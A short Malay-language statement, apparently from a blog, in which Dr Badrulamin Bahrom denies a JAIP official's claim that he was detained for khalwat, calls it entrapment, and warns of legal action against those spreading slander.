Kenyataan Timbalan Pengarah JAIP bahawa saya ditahan oleh pegawai JAIP ketika berkhalwat adalah tidak benar sama sekali. Saya beranggapan bahawa kejadian ini merupakan satu tindakan terancang untuk memerangkap dan mengaibkan saya. Saya hanya dipanggil untuk membantu siasatan JAIP pada 27 Februari 2012. Saya akan hadir bersama peguam untuk memberi kerjasama penuh kepada siasatan ini.

Dengan penjelasan ini, saya berharap semua pihak menghentikan tohmahan dan fitnah terhadap saya. Saya tidak akan teragak-agak untuk mengambil tindakan undang-undang terhadap mana-mana pihak yang membuat tuduhan dan fitnah terhadap saya.

Dr Badrulamin Bahrom

Tiada ulasan: